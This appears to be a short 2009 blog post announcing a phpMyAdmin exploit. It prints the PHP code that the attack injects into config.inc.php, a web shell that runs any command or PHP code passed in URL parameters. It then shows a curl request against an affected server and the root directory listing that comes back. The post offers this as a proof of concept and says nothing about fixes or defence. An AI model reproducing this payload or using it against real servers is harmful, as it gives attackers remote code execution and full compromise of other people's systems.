New phpMyAdmin exploit
10.Jun.2009 ~
0 Comentarios ~
4842 Lecturas
It's a bash script that injects code into config.php allowing remote code execution:
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'(pre)';system($_GET['c']);echo '(/pre)';}if($_GET['p']){echo
'(pre)';eval($_GET['p']);echo '(/pre)';};//'] = 'localhost';
By the way, in a infected system we could execute some commands like this:
$ curl "http://dominio-afectado/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
drwxr-xr-x 3 root root 4096 May 6 10:01 boot
drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
drwxr-xr-x 3 root root 4096 Oct 18 2008 home
drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd
[...]
I think you would read the proof of concept carefully. 
Comentarios